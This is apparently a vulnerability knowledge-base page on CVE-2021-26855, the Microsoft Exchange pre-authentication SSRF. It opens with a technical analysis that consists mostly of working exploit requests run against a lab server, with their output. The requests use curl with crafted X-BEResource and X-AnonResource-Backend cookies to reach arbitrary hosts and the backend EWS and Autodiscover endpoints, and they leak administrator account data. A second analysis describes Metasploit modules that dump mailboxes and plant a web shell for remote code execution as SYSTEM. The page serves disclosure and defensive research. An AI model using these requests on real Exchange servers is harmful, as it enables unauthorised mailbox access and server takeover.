Attacker Value
Very High
(2 users assessed)
Exploitability
High
(2 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
3

CVE-2021-26855

Disclosure Date: March 03, 2021
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Initial Access
Techniques
Validation
Validated

Description

Microsoft Exchange Server Remote Code Execution Vulnerability

Add Assessment

2
Ratings
Technical Analysis

CVE-2021-26855

CVE-2021-26855 is an SSRF vulnerability in Exchange that allows privileged access to Exchange’s backend resources, ultimately leading to pre-auth RCE when combined with CVEs such as CVE-2021-27065.

Microsoft’s (Nmap) NSE script

Conveniently disclosed in Microsoft’s alternative mitigations, this script provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.

wvu@kharak:~/Downloads$ ls
http-vuln-cve2021-26855.nse
wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.00s elapsed
Initiating Connect Scan at 00:50
Scanning 192.168.123.183 [1 port]
Discovered open port 443/tcp on 192.168.123.183
Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.123.183.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.02s elapsed
Nmap scan report for 192.168.123.183
Host is up (0.00064s latency).

PORT    STATE SERVICE
443/tcp open  https
| http-vuln-cve2021-26855:
|   VULNERABLE:
|   Exchange Server SSRF Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2021-26855
|       Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.
|
|     Disclosure date: 2021-03-02
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855
|_      http://aka.ms/exchangevulns

NSE: Script Post-scanning.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
wvu@kharak:~/Downloads$

Ported to curl(1)

wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;" https://192.168.123.183/owa/auth/x.js
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f8cb580b400)
> GET /owa/auth/x.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 500
< cache-control: private
< content-type: text/html; charset=utf-8
< server: Microsoft-IIS/10.0
< request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02
< x-calculatedbetarget: localhost
< x-calculatedbetarget: localhost
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< x-powered-by: ASP.NET
< date: Tue, 09 Mar 2021 06:52:07 GMT
< content-length: 85
<
* Connection #0 to host 192.168.123.183 left intact
NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0
wvu@kharak:~$

SSRF to an arbitrary remote host

You can specify an arbitrary host in X-AnonResource-Backend.

wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM" "https://192.168.123.183/owa/auth/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f9ea080d600)
> GET /owa/auth/22702.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!

Catching the request in ncat(1)

wvu@kharak:~$ ncat -lkv --ssl 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.123.183.
Ncat: Connection from 192.168.123.183:6303.
GET /owa/auth/22702.js HTTP/1.1
X-FE-ClientIP: 192.168.123.1
X-Forwarded-For: 192.168.123.1
X-Forwarded-Port: 55723
X-MS-EdgeIP:
X-ExCompId: ClientAccessFrontEnd
Accept: */*
User-Agent: curl/7.64.1
X-OriginalRequestHost: 192.168.123.183
X-OriginalRequestHostSchemePort: 443:https:192.168.123.183
X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=
msExchProxyUri: https://192.168.123.183/owa/auth/22702.js
X-IsFromCafe: 1
X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL
X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA
X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e
Host: 192.168.123.1
Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563
Connection: Keep-Alive

The fun folks working on the Nuclei scanner noticed burpcollaborator.net made a good target for their scanner.

wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM" "https://192.168.123.183/owa/auth/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7fd58480f600)
> GET /owa/auth/18409.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 200
< cache-control: private
< content-type: text/html
< server: Microsoft-IIS/10.0
< request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8
< x-calculatedbetarget: burpcollaborator.net
< x-collaborator-version: 4
< x-aspnet-version: 4.0.30319
< x-powered-by: ASP.NET
< date: Tue, 09 Mar 2021 07:58:52 GMT
< content-length: 1190
<
<!DOCTYPE html>
<html>
<head>
 <meta charset="UTF-8">
</head>
<body>
<h1>Burp Collaborator Server</h1>
<p>Burp Collaborator is a service that is used by <a href="https://portswigger.net/burp/">Burp Suite</a> when testing web applications for security
vulnerabilities. Some of Burp Suite's tests may cause the application being
tested to interact with the Burp Collaborator server, to enable Burp Suite
to detect various security vulnerabilities.
</p><p>The Burp Collaborator server does not itself initiate any interactions with
any system, and only responds to interactions that it receives from other
systems.
</p><p>If you are a systems administrator and you are seeing interactions with the
Burp Collaborator server in your logs, then it is likely that someone is
testing your web application using Burp Suite. If you are trying to identify
the person responsible for this testing, you should review your web server
or applications logs for the time at which these interactions were initiated
by your systems.
</p><p>For further details about Burp Collaborator, please see the <a href="https://portswigger.net/burp/documentation/collaborator/">full documentation</a>.</p></body>
* Connection #0 to host 192.168.123.183 left intact
</html>* Closing connection 0
wvu@kharak:~$

SSRF to a privileged backend resource

Hostname WIN-T4RO9496TA7 is from the x-feserver header.

wvu@kharak:~$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM" "https://192.168.123.183/ecp/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7faac2808200)
> GET /ecp/1849.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 200
< cache-control: private
< content-type: text/html; charset=UTF-8
< server: Microsoft-IIS/10.0
< request-id: b4762a11-d418-43f8-a435-f04420289a4c
< x-calculatedbetarget: win-t4ro9496ta7
< x-calculatedbetarget: win-t4ro9496ta7.gibson.local
< x-diaginfo: WIN-T4RO9496TA7
< x-beserver: WIN-T4RO9496TA7
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly
< set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly
< x-powered-by: ASP.NET
< x-feserver: WIN-T4RO9496TA7
< date: Tue, 09 Mar 2021 07:00:11 GMT
< content-length: 2836
<
<HTML lang="en"><HEAD><link rel="alternate" type="text/xml" href="https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco"/><STYLE type="text/css">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id="content" role="main"><h1 class="heading1">Service</h1><BR/><P class="intro">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF="https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class="intro">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color="blue">class </font><font color="black">Test
</font>{
<font color="blue">    static void </font>Main()
    {
        <font color="black">HelloClient</font> client = <font color="blue">new </font><font color="black">HelloClient</font>();

<font color="darkgreen">        // Use the 'client' variable to call operations on the service.

</font><font color="darkgreen">        // Always close the client.
</font>        client.Close();
    }
}
</PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color="blue">Class </font><font color="black">Test
</font><font color="blue">    Shared Sub </font>Main()
<font color="blue">        Dim </font>client As <font color="black">HelloClient</font> = <font color="blue">New </font><font color="black">HelloClient</font>()
<font color="darkgreen">        ' Use the 'client' variable to call operations on the service.

</font><font color="darkgreen">        ' Always close the client.
</font>        client.Close()
<font color="blue">    End Sub
* Connection #0 to host 192.168.123.183 left intact
</font><font color="blue">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0
wvu@kharak:~$

POSTing to the EWS endpoint (not shown) allows an attacker access to a target’s mailbox. A sample Autodiscover request is shown below.

wvu@kharak:~/Downloads$ cat poc.xml
<?xml version="1.0"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>Administrator@gibson.local</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>
wvu@kharak:~/Downloads$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM" -H "Content-Type: text/xml" "https://192.168.123.207/ecp/$RANDOM.js" -d @poc.xml
*   Trying 192.168.123.207...
* TCP_NODELAY set
* Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7fa592808200)
> POST /ecp/3425.js HTTP/2
> Host: 192.168.123.207
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753
> Content-Type: text/xml
> Content-Length: 354
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
* We are completely uploaded and fine
< HTTP/2 200
< cache-control: private
< content-type: text/xml; charset=utf-8
< server: Microsoft-IIS/10.0
< request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1
< x-calculatedbetarget: win-t4ro9496ta7
< x-calculatedbetarget: win-t4ro9496ta7.gibson.local
< x-diaginfo: WIN-T4RO9496TA7
< x-beserver: WIN-T4RO9496TA7
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly
< x-powered-by: ASP.NET
< x-feserver: WIN-T4RO9496TA7
< date: Wed, 10 Mar 2021 01:26:19 GMT
< content-length: 3866
<
<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Administrator</DisplayName>
      <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>
      <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>
      <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>
        <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>
        <ServerVersion>73C18880</ServerVersion>
        <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>
        <AD>WIN-T4RO9496TA7.gibson.local</AD>
        <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>
        <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>
        <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>
        <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>
        <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>
        <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>
        <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>
        <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>
        <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>
        <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>
        <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>win-t4ro9496ta7.gibson.local</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
* Connection #0 to host 192.168.123.207 left intact
</Autodiscover>* Closing connection 0
wvu@kharak:~/Downloads$
2
Ratings
Technical Analysis

Three modules exploiting this vulnerability have been added to Metasploit:

  1. A scanner module that checks if the target is vulnerable to this Server-Side Request Forgery.
  2. An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information.
  3. An exploit module that leverages an unauthenticated Remote Code Execution. This allows execution of arbitrary commands as the SYSTEM user. This module takes advantage of the same SSRF vulnerability and also of a post-auth arbitrary-file-write vulnerability identified as CVE-2021-27065.

The auxiliary module (2) leverages this SSRF to retrieve the internal Exchange server name and query the Autodiscover service to retrieve other internal data. All of this is done without authentication through the Exchange Admin Center (EAC), usually located at https://<ServerFQDN>/ecp, so it needs to be accessible. It finally POSTs to the EWS endpoint to dump emails, contacts, etc. Note that this exploit needs at least two Exchange servers to work. One is the host the module directly sends requests to and the other server is the internal resource the SSRF targets.

The exploit module (3) follows the same workflow but retrieves extra information such as the user SID, session ID, canary value, etc. Then, still using the SSRF, the module exploits the arbitrary-file-write vulnerability (CVE-2021-27065) to create a custom .aspx web page that embeds a web shell. Finally, once this backdoor is planted, it uses it to stage the actual payload and execute it. Note that, for this exploit to work, the email address used needs to be the email address of an Administrator on the Exchange server. It is not really something difficult to obtain, as long as you know the name of an admin and the email pattern used internally.

CVSS V3 Severity and Metrics
Base Score:
9.1 Critical
Impact Score:
5.2
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
None

General Information

Vendors

  • microsoft

Products

  • exchange server 2013,
  • exchange server 2016,
  • exchange server 2019

Exploited in the Wild

Reported by:
Technical Analysis